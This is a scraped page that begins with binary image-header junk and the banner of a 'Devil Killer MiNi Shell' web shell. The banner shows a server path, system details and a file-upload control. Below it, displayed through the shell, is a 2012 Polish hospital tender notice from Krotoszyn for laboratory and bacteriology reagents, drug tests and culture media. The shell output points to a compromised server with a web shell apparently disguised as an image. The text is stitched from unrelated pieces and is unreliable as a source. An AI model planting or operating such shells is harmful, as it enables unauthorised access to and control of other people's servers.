JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120201/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120201/30396-N-2012.html

<p class="kh_header"><b>Krotoszyn: DOSTAWA ODCZYNNIKÓW DLA LABORATORIUM I BAKTERIOLOGII.</b><br>
<b>Numer ogłoszenia: 30396 - 2012; data zamieszczenia: 01.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Młyńska 2, 63-700 Krotoszyn, woj. wielkopolskie, tel. 062 5880390 w. 253, faks 062 5880402.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzoz.krotoszyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA ODCZYNNIKÓW DLA LABORATORIUM I BAKTERIOLOGII..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> DOSTAWA ODCZYNNIKÓW DLA LABORATORIUM I BAKTERIOLOGII - PAKIET NR 1-21, WG ZAŁĄCZNIKA NR 2 DO SIWZ O WARTOŚCI PONIŻEJ 200 TYS. EURO..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>DOSTAWA ODCZYNNIKÓW DLA LABORATORIUM I BAKTERIOLOGII, MAKSYMALNIE 20% ZAMÓWIENIA PODSTAWOWEGO.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 21.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego wykonawca winien dołączyć do oferty następujące dokumenty:
			1)	Parametry wymagane jakościowo-techniczne odczynników, aparatury do 			oznaczeń w serologii transfuzjologicznej metodą aglutynacji kolumnowej (dot. 		pakietu nr 6) - załącznik nr 5.

	2)	Parametry wymagane aparatu do analizy mikrobiologicznej - (dot. pakietu nr 		15) - załącznik nr 6.
	3)	Wydruk z monitoringu temperatury - stosownie do wymagań Pakietu nr 6.
	4)	W zakresie Pakietu nr 7 producent podłoży musi posiadać certyfikat ISO 			13845 i ISO 9001, deklarację zgodności oraz certyfikat analizy (należy 			dołączyć do oferty). Wykonawca musi dołączyć do oferty w zakresie Pakietu 		nr 7 również wykaz terminów ważności pożywek.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta winna zawierać wszystkie dokumenty i oświadczenia wymienione w rozdziale III pkt 7 i rozdziale VI niniejszej SIWZ oraz : 
a.	Formularz ofertowy podpisany przez osobę upoważnioną do składania oświadczenia woli w imieniu wykonawcy z wykorzystaniem wzoru - załącznik nr 1.
b.	Formularz cenowy podpisany przez osobę upoważnioną do składania oświadczenia woli w imieniu wykonawcy z wykorzystaniem wzoru - załącznik nr 2. Do oferty należy dołączyć wypełnione Formularze cenowe również w formie elektronicznej (plik.xls) z niezablokowanymi formułami. Formularze cenowe w formie pliku.xls umieszczone są i dostępne do ściągnięcia na stronie internetowej Zamawiającego www.bip.spzoz.krotoszyn.pl .
c.	Projekt umowy podpisany przez osobę upoważnioną do składania oświadczenia woli w imieniu wykonawcy z wykorzystaniem wzoru - załącznik nr 4.

W przypadku podpisania oferty oraz poświadczenia za zgodność z oryginałem kopii dokumentów przez osobę niewymienioną w dokumencie rejestracyjnym (ewidencyjnym) Wykonawcy, należy do oferty dołączyć stosowne pełnomocnictwo (oryginał lub kopia poświadczona za zgodność z oryginałem przez notariusza).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>§ 6 PROJEKTU UMOWY: 2. Strony ustalają możliwość zmiany cen wynikających z okoliczności, których nie można było przewidzieć w chwili zawarcia niniejszej umowy. Za okoliczność taką uważa się : - zmianę stawek podatku VAT. 3. W przypadku ustawowej zmiany stawki podatku VAT na przedmiot niniejszego zamówienia, jej zmiana następuje z mocy prawa. § 13 PROJEKTU UMOWY. 1. Zmiana postanowień zawartej umowy może nastąpić wyłącznie w sytuacji przewidzianej w § 6 umowy oraz w przypadkach wymienionych poniżej, za zgodą obu stron wyrażoną na piśmie, pod rygorem nieważności.2.	Strony dopuszczają zmiany umowy w zakresie: 
- nazwy produktu przy zachowaniu jego parametrów ,
- sposobu konfekcjonowania,
- liczby opakowań,
- wprowadzenia do sprzedaży przez wykonawcę produktu zmodyfikowanego / udoskonalonego.,
- numeru katalogowego produktu  (w tym przypadku zmiana może być dokonana na podstawie pisemnego powiadomienia Zamawiającego o zmianie numeru katalogowego, bez konieczności podpisywania aneksu do umowy, z zaznaczeniem, której pozycji w Formularzu cenowym zmiana numeru katalogowego dotyczy),
- zmiany stężenia w przypadku zmiany zaleceń wg EUCAST (dotyczy krążków-pakiet nr 8)
Powyższe zmiany nie mogą skutkować zmianą ceny jednostkowej, wartości umowy i nie mogą być niekorzystne dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.spzoz.krotoszyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SPZOZ KROTOSZYN, UL. MŁYŃSKA 2, 63-700 KROTOSZYN, POKÓJ NR 20..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.02.2012 godzina 10:00, miejsce: SEKRETARIAT SPZOZ KROTOSZYN, UL. MŁYŃSKA 2, 63-700 KROTOSZYN, POKÓJ NR 1..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1 - odczynniki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Bilirubina bezpośrednia i całkowita			ml.	400
2	Glukoza + wzorzec - 
roztwór gotowy do użycia			ml	35000
3	Seromukoid			oznaczeń	800
Zamawiający wymaga :
Dołączenia do oferty metodyk w języku polskim potwierdzających spełnienie wymagań SIWZ przez oferowany asortyment.										
						 			 	
Zamawiający dopuszca :
Oddzielny zestaw do oznaczania bilirubiny bezposredniej -200 ml i bilirubiny całkowitej -200 ml 										
										
	Uwaga:w przypadku nie stosowania u danego Wykonawcy numeru katalogowego należy zaznaczyć to w formularzu cenowym zapisem np.: -nie stosuje-.									
										
	Brak wypełnienia kolumny -Nazwa handlowa /producent - wymaganymi informacjami spowoduje odrzucenie oferty na pdostawie art. 89 ust. 1 pkt 2 Pzp. W przypadku, gdy nazwa handlowa zaoferowanych artykułów pokrywa się z nazwą podaną przez Zamawiajacego należy wpisać zwrot - Jak u Zamawiającego -..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2 - Testy narkotyczne kasetkowe,testy..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Amfetamina - minimalny dolny próg wykrywalności 1000 ng/ml  ( op. a        szt.)			szt.	200
2	Barbiturany - minimalny dolny próg wykrywalności 300 ng/ml  ( op. a        szt.)			szt.	200
3	Benzodiazepina - minimalny dolny próg wykrywalności 300 ng/ml  ( op. a        szt.)			szt.	200
4	Ekstazy - minimalny dolny próg wykrywalności 500ng/ml  ( op. a        szt.)			szt.	200
5	Marihuana - minimalny dolny próg wykrywalności 50 ng/ml  ( op. a        szt.)			szt.	200
	Testy 				
6	Anty - streptolizyna ASO  
( op. a        szt.)			szt.	400
7	Anty DNA 
 ( op. a        szt.)		szt.	400
8	Czynnik reumatoidalny RF 
 ( op. a        szt.)			szt.	550
9	Helicobacter pylori test płytkowy do wykrywania przeciwciał w surowicy
 ( op. a        szt.)			szt.	200
10	Test do wykrywania kiły metodą RPR
( op. a        szt.)			szt.	1 500
11	Test immunochromotograficzny na krew utajoną w kale o czułosci min.50 ng/ml
( op. a        szt.)			szt.	500
12	Test immunoenzymatyczny na Lamblie metodą ELISA o czułości min.5 ng/ml atygenu
Giardia ( op. a        szt.)			szt.	700

Zamawiający wymaga :
Wpisania w kolumnie -Nazwa artykułu- ilości sztuk w pojedyńczym opakowaniu  i dołączenia do oferty metodyk w języku polskim potwierdzających spełnienie wymagań SIWZ przez oferowany asortyment.
W poz.11 testu blokującego interferencję ze strony przeciwciał heterofilnych, o braku efektu prozonowego do min. 1000000 mlU/mlhCG 
W poz.12 testu którego czułość i swoistość wynosi 100%, który został oceniony przy użyciu świeżych próbek kału,
testu z max 2 seriami płukań (max 4 powtórzenia każda seria)										
										
Zamawiający dopuszcza :
Testy o wyższej czułości niż podane w tabeli										
										
	Uwaga:w przypadku nie stosowania u danego Wykonawcy numeru katalogowego należy zaznaczyć to w formularzu cenowym zapisem np.: -nie stosuje-.									
										
	Brak wypełnienia kolumny -Nazwa handlowa /producent - wymaganymi informacjami spowoduje odrzucenie oferty na pdostawie art. 89 ust. 1 pkt 2 Pzp. W przypadku, gdy nazwa handlowa zaoferowanych artykułów pokrywa się z nazwą podaną przez Zamawiajacego należy wpisać zwrot - Jak u Zamawiającego -..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3 - Paski do moczu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Test paskowy do moczu do odczytu wizualnego jedenastoparametrowy (glukoza, ketony, pH, bilirubina, urobilinogen, białko, azotyny, ciężar właściwy, krew, leukocyty, kwas askorbinowy)			szt.	30 000
Zamawiający wymaga :
Dołączenia do oferty metodyk w języku polskim potwierdzających spełnienie wymagań SIWZ przez oferowany asortyment.										
							 			
	Uwaga:w przypadku nie stosowania u danego Wykonawcy numeru katalogowego należy zaznaczyć to w formularzu cenowym zapisem np.: -nie stosuje-.									
										
	Brak wypełnienia kolumny -Nazwa handlowa /producent - wymaganymi informacjami spowoduje odrzucenie oferty na pdostawie art. 89 ust. 1 pkt 2 Pzp. W przypadku, gdy nazwa handlowa zaoferowanych artykułów pokrywa się z nazwą podaną przez Zamawiajacego należy wpisać zwrot - Jak u Zamawiającego -..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet nr 4 - Odczynniki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Błękit metylenowy Loeflera			l	1
2.	Fiolet krystaliczny ( met. Grama)			l	6
3.	Fuksyna karbolowa (met. Grama)			l	6
4.	Odbarwiacz (met. Grama)			l	6
5.	Odczynnik Ehrlicha			l	2
6.	Odczynnik Giemsa			l	20
7.	Odczynnik Lugola			l	6
8.	Odczynnik Mac Williama			l	20
9.	Odczynnik May Grunwalda			l	15
10.	Odczynnik Rosini			l	1
11.	TCA  10%			l	10
12.	Płyn do liczenia płytek 			l	0,4
13.	Płyn Türka			l	0,4
14.	Płyn Nonne - Apelta			l	0,4
15.	Płyn Pandiego			l	0,4
16.	Zieleń malachitowa 2%			l	0,4
17.	Hematoksylina Mayera			l	3
18.	Karbol - Ksylen 1 + 3			l	3
19.	Ksylen cz.d.a			l	6
20.	Balsam kanadyjski do mikroskopu 
(a 500 ml)			l	1

Uwaga:w przypadku nie stosowania u danego Wykonawcy numeru katalogowego należy zaznaczyć to w formularzu cenowym zapisem np.: -nie stosuje-.									
									
Brak wypełnienia kolumny -Nazwa handlowa /producent - wymaganymi informacjami spowoduje odrzucenie oferty na pdostawie art. 89 ust. 1 pkt 2 Pzp. W przypadku, gdy nazwa handlowa zaoferowanych artykułów pokrywa się z nazwą podaną przez Zamawiajacego należy wpisać zwrot - Jak u Zamawiającego -..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet nr 5- Serologia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Odczynnik monoklonalny anty - A 
(BIRMA-1) - dwie różne serie			ml.	600
2	Odczynnik monoklonalny anty- B (LB-2)
 - dwie różne serie			ml.	600
3	Odczynnik monoklonalny anty - D RUM			ml.	600
4	Odczynnik monoklonalny anty - D BLEND 			ml.	600
5	Standard anty - D			ml.	700
6	PBS - buforowany roztwór NaCl			l.	100
7	Konserwowane krwinki wzorcowe do wykrywania przeciwciał			ml.	150
8	Standaryzowane krwinki wzorcowe 
typ PBS-VERA do ukladu AB0			ml.	600


Uwaga:w przypadku nie stosowania u danego Wykonawcy numeru katalogowego należy zaznaczyć to w formularzu cenowym zapisem np.: -nie stosuje-.									
									
Brak wypełnienia kolumny -Nazwa handlowa /producent - wymaganymi informacjami spowoduje odrzucenie oferty na pdostawie art. 89 ust. 1 pkt 2 Pzp. W przypadku, gdy nazwa handlowa zaoferowanych artykułów pokrywa się z nazwą podaną przez Zamawiajacego należy wpisać zwrot - Jak u Zamawiającego -..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet nr 6- odczynniki do serologii transfuzjologicznej metodą aglutynacji kolumnowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> GRUPA KRWI 			
1	Pełne oznaczenie grupy krwi z badaniem izoaglutynin grupowych (A-B-DVI-/A1-B)			3 600
2	Screening przeciwciał na 3 krw. wzorcowych w PTA LISS			3 600
	PRÓBA ZGODNOŚCI			
3	Właściwa próba krzyżowa PTA LISS: (liczba donacji)			2 000
4	Screening przeciwciał na 3 krw. wzorcowych w PTA LISS			1 000
	DODATKOWE BADANIA			
5	Grupa krwi noworodka z BTA 
(A-B-DVI-ctrl-BTA) - odczynnik anty-D nie wykrywający odmianę DVI			240
6	Potwierdzenie grupy krwi noworodka: druga seria A-B-D,inne klony niż w pkt 5 			240
7	Screening przeciwciał na 3 krw. wzorcowych w PTA LISS			1 000
	KRWINKI FIRMOWE DO BADANIA PRZEGLADOWEGO PRZECIWCIAŁ			
8	Zestaw 3 krwinek wzorcowych do screeningu p/c zawierające antygen Cw zawieszone w roztworze LISS			7 200
	MATERIAŁY ZUŻYWALNE POTRZEBNE DO WYKONYWANIA WW. ILOŚCI BADAŃ			
9	Zewnątrzlaboratoryjna międzynarodowa kontrola jakosci potwierdzona certyfikatem dostosowana do metod probówkowych i mikrokolumnowych			4 x rok
10	Odczynnik LISS  w ml.			6 000
11	Końcówki do pipety  w szt.			24 000
12	Dzierżawa urządzeń i oprogramowania do wykonywania badań. 
- Dzierżawa zestawu manualnego
- Dzierżawa oprogramowania do zarządzania gospodarką krwi w pracowni serologii transfuzjologicznej z niezbędnym sprzętem komputerowym, drukarką laserową z dwoma tonerami i czytnikiem barkodów dawców.			1 zestaw

_ Liczbę opakowań należy zaokrąglić do pełnego opakowania w górę. 
_Dostawa wg harmonogramu na czas trwania umowy z co miesieczną częstotliwością, dopuszcza się możliwość zmian w harmonogramie dostaw ze strony zamawiajacego po odpowiednio wcześniejszym poinformowaniu wykonawcy.
_ Dostawa interwencyjna w ciągu 5 dni od zgłoszenia.
_ Wszystkie odczynniki muszą pochodzić od jednego producenta i być dostarczone w tem. 2-8 °C potwierdzone wydrukiem z monitoringu temperatury jako załącznik do oferty.
_ Przy  fakturze należy podać  za który miesiac dostawy wg harmonogramu jest wystawiona faktura.											
											
	Uwaga:w przypadku nie stosowania u danego Wykonawcy numeru katalogowego należy zaznaczyć to w formularzu cenowym zapisem np.: -nie stosuje-.										
											
	Brak wypełnienia kolumny -Nazwa handlowa /producent - wymaganymi informacjami spowoduje odrzucenie oferty na pdostawie art. 89 ust. 1 pkt 2 Pzp. W przypadku, gdy nazwa handlowa zaoferowanych artykułów pokrywa się z nazwą podaną przez Zamawiajacego należy wpisać zwrot - Jak u Zamawiającego -..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet nr 7 - Podłoża.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Bulion tryptozowo - sojowy			kg	3,0
2	Bulion tryptozowo - sojowy (w butelkach a  500 ml.)			ml	5 000,0
3	Cled Agar			kg	2,0
4	Columbia Agar 			kg	2,0
5	Enterococcosel Agar			kg	1,0
6	MacConkey II Agar ( z fioletem krystalicznym)			kg	1,5
7	MacConkey Sorbitol Agar			kg	0,5
8	Mannitol Salt Agar ( Chapmann)			kg	2,0
9	Mueller Hinton II Agar			kg	2,0
10	Podłoże selektywne do izolacji Pseudomonas z cetrymidem			kg	1,0
11	Sabouraud Dextrose ( Agar z chloramfenikolem)			kg	1,0
12	Schaedler Agar 			kg	1,0
13	Schaedler Agar  z 5 % krwią barania i witaminną K-3			płytki	100,0
14	Schaedler Broth			kg	1,0
15	Schaedler Broth (w butelkach a 500 ml)			ml	5 000,0
